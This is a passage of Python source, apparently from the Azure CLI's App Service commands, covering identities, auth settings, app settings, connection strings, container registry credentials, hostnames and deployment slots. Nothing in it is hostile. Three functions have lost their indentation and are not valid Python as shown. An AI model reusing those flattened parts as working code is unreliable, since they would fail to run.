                                    else IdentityType.user_assigned)
        if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
            # rebuild the user-assigned map with the identities that survive
            webapp.identity.user_assigned_identities = {}
            if to_remove:
                for identity in list(existing_identities - to_remove):
                    webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
            else:
                for identity in list(existing_identities):
                    webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)

    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter)
    return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
    """Fetch the site's Easy Auth settings."""
    auth_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
    return auth_settings
def is_auth_runtime_version_valid(runtime_version=None):
    """Return True for None, '~N' (N parseable as int), or an 'x.y.z' string
    whose three parts all parse as int; False otherwise."""
    if runtime_version is None:
        return True
    if runtime_version.startswith("~") and len(runtime_version) > 1:
        try:
            int(runtime_version[1:])
            return True
        except ValueError:
            return False
    parts = runtime_version.split('.')
    if len(parts) != 3:
        return False
    try:
        for part in parts:
            int(part)
    except ValueError:
        return False
    return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
                         client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
                         token_refresh_extension_hours=None, # pylint: disable=unused-argument
                         allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
                         client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
                         allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
                         facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
                         twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
                         google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
                         google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
                         microsoft_account_client_secret=None, # pylint: disable=unused-argument
                         microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
    """Update the site's Easy Auth settings.

    Every keyword the caller passes a truthy value for is copied onto the
    auth-settings object by parameter name via frame reflection (see below);
    'enabled' and 'token_store_enabled' are parsed as 'true'/'false' booleans.
    """
    auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
    UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
    if action == 'AllowAnonymous':
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
    elif action:
        # any other action redirects to the login page of the mapped provider
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
        auth_settings.default_provider = AUTH_TYPES[action]
    # validate runtime version
    if not is_auth_runtime_version_valid(runtime_version):
        raise CLIError('Usage Error: --runtime-version set to invalid value')
    import inspect
    frame = inspect.currentframe()
    bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
    # NOTE(review): args[2:] also sweeps in 'name', 'action' and 'slot', so
    # truthy values for those get set on auth_settings too — confirm this is
    # intentional before refactoring the parameter list.
    for arg in args[2:]:
        if values.get(arg, None):
            setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
    """List the app's VM instances.

    Pinned to API 2018-02-01: the 2019-08-01 version (latest when this was
    written) does not return slot instances.
    """
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
                                   api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
    """List runtime stack display names from the live stacks API (the
    hardcoded variant is currently preferred; see list_runtimes_hardcoded)."""
    client = web_client_factory(cmd.cli_ctx)
    helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
    return [stack['displayName'] for stack in helper.stacks]
def list_runtimes_hardcoded(linux=False):
    """List runtime stack display names from the checked-in RUNTIME_STACKS
    JSON file."""
    stacks = get_file_json(RUNTIME_STACKS)
    platform_key = 'linux' if linux else 'windows'
    return [stack['displayName'] for stack in stacks[platform_key]]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
    """Delete a function app (or one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
                  keep_dns_registration=None, slot=None):
    """Delete a web app (or slot).

    The keep_* flags suppress the service-side defaults of also deleting
    metrics, the now-empty plan, and the DNS registration.
    """
    client = web_client_factory(cmd.cli_ctx)
    delete_kwargs = dict(delete_metrics=False if keep_metrics else None,
                         delete_empty_server_farm=False if keep_empty_plan else None,
                         skip_dns_registration=False if keep_dns_registration else None)
    if slot:
        client.web_apps.delete_slot(resource_group_name, name, slot, **delete_kwargs)
    else:
        client.web_apps.delete(resource_group_name, name, **delete_kwargs)
def stop_webapp(cmd, resource_group_name, name, slot=None):
    """Stop the app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
    """Start the app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
    """Restart the app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
    """Fetch the SiteConfig resource for the app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
    """Return app settings as [{'name', 'value', 'slotSetting'}, ...], marking
    slot-sticky settings."""
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
    return _build_app_settings_output(app_settings.properties, sticky_names)
# Check whether app settings have propagated to the Kudu (SCM) site by
# querying its api/settings endpoint.
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
                                 should_have=None, should_not_have=None, should_contain=None):
    """Return True when the SCM site's settings satisfy all constraints.

    should_have -- list of setting names that must be present
    should_not_have -- list of setting names that must be absent
    should_contain -- dict of name->value pairs that must match exactly
    """
    scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
    present = set(scm_settings.keys())
    if should_have and not set(should_have).issubset(present):
        return False
    if should_not_have and set(should_not_have).intersection(present):
        return False
    expected = should_contain or {}
    return all(key in scm_settings and scm_settings[key] == value
               for key, value in expected.items())
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
    """GET /api/settings from the Kudu site using basic publishing creds;
    returns {} when the response body is empty."""
    import requests
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    headers = {
        'Content-Type': 'application/octet-stream',
        'Cache-Control': 'no-cache',
        'User-Agent': get_az_user_agent()
    }
    response = requests.get('{}/api/settings'.format(scm_url), headers=headers,
                            auth=(username, password), timeout=3)
    return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
    """Return connection strings as
    [{'name', 'value', 'type', 'slotSetting'}, ...]."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
        .connection_string_names or []
    return [{'name': key,
             'value': conn_strings.properties[key].value,
             'type': conn_strings.properties[key].type,
             'slotSetting': key in sticky_names} for key in conn_strings.properties]
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
    """Return the app's Azure Files/Blob mounts as
    [{'name', 'value', 'slotSetting'}, ...]."""
    client = web_client_factory(cmd.cli_ctx)
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
        .azure_storage_config_names or []
    return [{'name': key,
             'value': accounts.properties[key],
             'slotSetting': key in sticky_names} for key in accounts.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
    """Attach the FTP publish URL to *webapp* as 'ftpPublishingUrl'.

    Fix: the original used a bare ``next(...)`` which let StopIteration
    escape (crashing the caller) when no FTP publish profile exists; now the
    attribute is simply left unset in that case.
    """
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    url = next((p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP'), None)
    if url is not None:
        setattr(webapp, 'ftpPublishingUrl', url)
    return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
    """Set the container image on the appropriate fx slot — linux for
    reserved (Linux) apps, windows for xenon (Windows container) apps."""
    fx_version = _format_fx_version(custom_image_name)
    web_app = get_webapp(cmd, resource_group_name, name, slot)
    if not web_app:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    return update_site_configs(cmd, resource_group_name, name,
                               linux_fx_version=fx_version if web_app.reserved else None,
                               windows_fx_version=fx_version if web_app.is_xenon else None,
                               slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
    """Clear linux_fx_version (a single space is the API's 'unset' value)."""
    return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
    """Return whichever fx version is set (linux first, then windows), or ''."""
    site_config = get_site_configs(cmd, resource_group_name, name, slot)
    for fx in (site_config.linux_fx_version, site_config.windows_fx_version):
        if fx:
            return fx
    return ''
def url_validator(url):
    """Return True when *url* parses with a scheme, a network location and a
    non-empty path; False otherwise (including parse failures)."""
    try:
        parts = urlparse(url)
    except ValueError:
        return False
    return bool(parts.scheme and parts.netloc and parts.path)
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
    """Base64-decode the config payload of a multicontainer linux fx version
    ('<TYPE>|<base64 config>')."""
    from base64 import b64decode
    linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
    if not any(linux_fx_version.startswith(prefix) for prefix in MULTI_CONTAINER_TYPES):
        raise CLIError("Cannot decode config that is not one of the"
                       " following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
    encoded_config = linux_fx_version.split('|')[1]
    return b64decode(encoded_config.encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
    """Read a multicontainer config from a local path or URL and return it
    base64-encoded as a utf-8 string."""
    from base64 import b64encode
    if url_validator(file_name):
        response = urlopen(file_name, context=_ssl_context())
        config_file_bytes = response.read()
    else:
        with open(file_name, 'rb') as f:
            config_file_bytes = f.read()
    # Encode the raw bytes as base64 and return text (original comment said
    # "Decode" — this path encodes)
    return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
                        windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
                        python_version=None, net_framework_version=None,
                        java_version=None, java_container=None, java_container_version=None,
                        remote_debugging_enabled=None, web_sockets_enabled=None,
                        always_on=None, auto_heal_enabled=None,
                        use32_bit_worker_process=None,
                        min_tls_version=None,
                        http20_enabled=None,
                        app_command_line=None,
                        ftps_state=None,
                        generic_configurations=None):
    """Update site configuration properties.

    Non-None/truthy keyword values are reflected onto the SiteConfig object
    by parameter name via frame inspection (see the reflection note above the
    function), so parameter names must match SiteConfig attribute names.
    generic_configurations accepts JSON strings or KEY=VALUE pairs for
    arbitrary properties.
    """
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
    if linux_fx_version:
        if linux_fx_version.strip().lower().startswith('docker|'):
            # single-container docker apps must not mount app-service storage
            update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
        else:
            delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
    if pre_warmed_instance_count is not None:
        pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
                                                               min_val=0, max_val=20)
    import inspect
    frame = inspect.currentframe()
    bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
                  'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
    int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
    # args[3:] skips cmd/resource_group_name/name; int flags are range-checked
    # and converted, bool flags compare against the string 'true'
    for arg in args[3:]:
        if arg in int_flags and values[arg] is not None:
            values[arg] = validate_and_convert_to_int(arg, values[arg])
        if arg != 'generic_configurations' and values.get(arg, None):
            setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
    generic_configurations = generic_configurations or []
    result = {}
    for s in generic_configurations:
        try:
            result.update(get_json_object(s))
        except CLIError:
            # not JSON — fall back to KEY=VALUE parsing
            config_name, value = s.split('=', 1)
            result[config_name] = value
    for config_name, value in result.items():
        setattr(configs, config_name, value)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove the named app settings; settings that were slot-sticky are also
    removed from the sticky-name list."""
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky = slot_cfg_names.app_setting_names
    touched_sticky = False
    for setting_name in setting_names:
        app_settings.properties.pop(setting_name, None)
        if sticky and setting_name in sticky:
            sticky.remove(setting_name)
            touched_sticky = True
    if touched_sticky:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)
    return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
    """Remove one Azure Files/Blob mount by its custom id; unmark it as
    slot-sticky when needed."""
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    azure_storage_accounts.properties.pop(custom_id, None)
    sticky = slot_cfg_names.azure_storage_config_names
    if sticky and custom_id in sticky:
        sticky.remove(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts.properties,
                                         slot, client)
    return result.properties
def _ssl_context():
    """Build an SSL context for urlopen.

    Bug fix: the original evaluated ``sys.platform.system()`` — ``sys.platform``
    is a string, so the call raised AttributeError whenever that branch was
    reached (inside Cloud Console). ``sys.platform == 'win32'`` is the correct
    Windows check and needs no extra import.
    """
    if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform == 'win32'):
        try:
            # PROTOCOL_TLS was added in python 2.7.13 and 3.6
            return ssl.SSLContext(ssl.PROTOCOL_TLS)
        except AttributeError:
            return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
    """Shape a settings dict into the CLI's list-of-dicts output, masking
    credential-related values and flagging slot-sticky names."""
    sticky = slot_cfg_names or []
    return [{'name': key,
             'value': app_settings[key],
             'slotSetting': key in sticky}
            for key in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
                              settings=None, slot=None, slot_settings=None):
    """Add or update connection strings; entries given via slot_settings also
    become slot-sticky.

    Fix: an empty value (e.g. ``NAME=``) no longer raises IndexError when
    checking for surrounding quotes.
    """
    from azure.mgmt.web.models import ConnStringValueTypePair
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')

    settings = settings or []
    slot_settings = slot_settings or []

    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    for name_value in settings + slot_settings:
        # split at the first '=', connection string should not have '=' in the name
        conn_string_name, value = name_value.split('=', 1)
        if value and value[0] in ["'", '"']:  # strip away the quotes used as separators
            value = value[1:-1]
        conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
                                                                            type=connection_string_type)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_connection_strings',
                                         conn_strings.properties, slot, client)
    if slot_settings:
        # record the slot-sticky names alongside the values
        new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
        slot_cfg_names.connection_string_names += new_slot_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove the named connection strings; names that were slot-sticky are
    also removed from the sticky-name list."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky = slot_cfg_names.connection_string_names
    touched_sticky = False
    for setting_name in setting_names:
        conn_strings.properties.pop(setting_name, None)
        if sticky and setting_name in sticky:
            sticky.remove(setting_name)
            touched_sticky = True
    if touched_sticky:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                       'update_connection_strings',
                                       conn_strings.properties, slot, client)
# App settings that configure a site's container (registry URL/credentials
# and the app-service-storage toggle)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
                              'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
# Settings whose values must be masked in CLI output
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
                              docker_custom_image_name=None, docker_registry_server_user=None,
                              websites_enable_app_service_storage=None, docker_registry_server_password=None,
                              multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
    """Update container-related app settings and the site's fx version.

    Registry credentials are looked up from ACR automatically when only an
    *.azurecr.io URL is supplied. Returns the container-related app settings
    with credential values masked.
    """
    settings = []
    if docker_registry_server_url is not None:
        settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)

    # try ACR credential lookup when an azurecr.io URL comes without creds
    if (not docker_registry_server_user and not docker_registry_server_password and
            docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
        logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
        parsed = urlparse(docker_registry_server_url)
        registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
        try:
            docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
        except Exception as ex: # pylint: disable=broad-except
            logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed

    if docker_registry_server_user is not None:
        settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
    if docker_registry_server_password is not None:
        settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
    if websites_enable_app_service_storage:
        settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)

    if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
        update_app_settings(cmd, resource_group_name, name, settings, slot)
    # re-read so the returned settings reflect the update
    settings = get_app_settings(cmd, resource_group_name, name, slot)

    if docker_custom_image_name is not None:
        _add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)

    if multicontainer_config_file and multicontainer_config_type:
        encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
        linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
        update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
    elif multicontainer_config_file or multicontainer_config_type:
        # the two multicontainer flags are only meaningful together
        logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')

    return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
                                                                          slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
                                          docker_custom_image_name=None, docker_registry_server_user=None,
                                          docker_registry_server_password=None, slot=None):
    """Function-app variant of update_container_settings.

    Delegates to the webapp implementation; the positional None presumably fills
    the webapp-only 'websites_enable_app_service_storage' parameter, which does
    not apply to function apps -- TODO confirm against update_container_settings'
    signature (defined above this chunk).
    """
    return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
                                     docker_custom_image_name, docker_registry_server_user, None,
                                     docker_registry_server_password, multicontainer_config_type=None,
                                     multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
    """Look up the admin username/password of an Azure Container Registry.

    Raises CLIError when the name is not found (or is ambiguous) in the
    subscription, or when the registry's admin user is disabled.
    """
    from azure.mgmt.containerregistry import ContainerRegistryManagementClient
    from azure.cli.core.commands.parameters import get_resources_in_subscription
    client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
    # locate the registry resource anywhere in the subscription; name must be unambiguous
    registries = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
    matches = [item for item in registries if item.name.lower() == registry_name]
    if len(matches) != 1:
        raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
    resource_group_name = parse_resource_id(matches[0].id)['resource_group']
    registry = client.get(resource_group_name, registry_name)
    if not registry.admin_user_enabled:  # pylint: disable=no-member
        raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
                       "credentials or run 'az acr update -n {} --admin-enabled true' to enable "
                       "admin first.".format(registry_name))
    cred = client.list_credentials(resource_group_name, registry_name)
    return cred.username, cred.passwords[0].value
def delete_container_settings(cmd, resource_group_name, name, slot=None):
    """Remove container configuration: clear the linux fx version and delete container app settings."""
    _delete_linux_fx_version(cmd, resource_group_name, name, slot)
    delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
    """Return the container-related app settings, with credential values masked."""
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
                                                                          show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
    """Function-app variant of show_container_settings (multicontainer config does not apply)."""
    return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
                                   show_multicontainer_config=None, slot=None):
    """Reduce *settings* to the container-related entries, appending the image
    name taken from the site's fx version and, when requested, the decoded
    multicontainer configuration."""
    filtered = [entry for entry in settings if entry['name'] in CONTAINER_APPSETTING_NAMES]
    fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
    if fx_version:
        filtered.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME',
                         'value': fx_version})
        if show_multicontainer_config:
            decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
            filtered.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
                             'value': decoded_value})
    return filtered
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
    """Null out any settings entry whose key appears in APPSETTINGS_TO_MASK."""
    keys_to_mask = [key for key in settings if key in APPSETTINGS_TO_MASK]
    for key in keys_to_mask:
        settings[key] = None
    return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Bind a custom hostname to a webapp (or one of its deployment slots)."""
    HostNameBinding = cmd.get_models('HostNameBinding')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
    if slot is None:
        return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
    return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
                                                                   slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Remove a hostname binding from a webapp (or one of its deployment slots)."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
    # NOTE: the slot variant takes (..., slot, hostname) -- parameter order differs from the non-slot call
    return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
    """List hostname bindings, trimming each name to its final path segment."""
    bindings = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                            'list_host_name_bindings', slot))
    for binding in bindings:
        binding.name = binding.name.rsplit('/', 1)[-1]
    return bindings
def get_external_ip(cmd, resource_group_name, webapp_name):
    """Return {'ip': <address>} for the webapp.

    ASE-hosted apps use the environment's VIP information; other apps have
    their default hostname resolved through DNS.
    """
    SslState = cmd.get_models('SslState')
    # logics here are ported from portal
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    if webapp.hosting_environment_profile:
        address = client.app_service_environments.list_vips(
            resource_group_name, webapp.hosting_environment_profile.name)
        if address.internal_ip_address:
            ip_address = address.internal_ip_address
        else:
            # an IP-based SSL binding gets a dedicated virtual IP; prefer it over the shared service IP
            vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
            ip_address = vip.virtual_ip if vip else address.service_ip_address
    else:
        ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
    return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
    """Create a deployment slot for a webapp, optionally cloning configuration.

    :param configuration_source: name of the slot (or the app itself) to clone
        configuration from; None creates the slot with defaults.
    """
    Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, webapp)
    site_config = get_site_configs(cmd, resource_group_name, webapp, None)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(webapp))
    if 'functionapp' in site.kind:
        raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
    location = site.location
    slot_def = Site(server_farm_id=site.server_farm_id, location=location)
    slot_def.site_config = SiteConfig()
    # if it is a Windows Container site, at least pass the necessary
    # app settings to perform the container image validation:
    if configuration_source and site_config.windows_fx_version:
        # get settings from the source
        clone_from_prod = configuration_source.lower() == webapp.lower()
        src_slot = None if clone_from_prod else configuration_source
        app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                               'list_application_settings', src_slot)
        settings = []
        for k, v in app_settings.properties.items():
            if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
                     "DOCKER_REGISTRY_SERVER_URL"):
                settings.append(NameValuePair(name=k, value=v))
        slot_def.site_config = SiteConfig(app_settings=settings)
    poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
    result = LongRunningOperation(cmd.cli_ctx)(poller)
    if configuration_source:
        update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
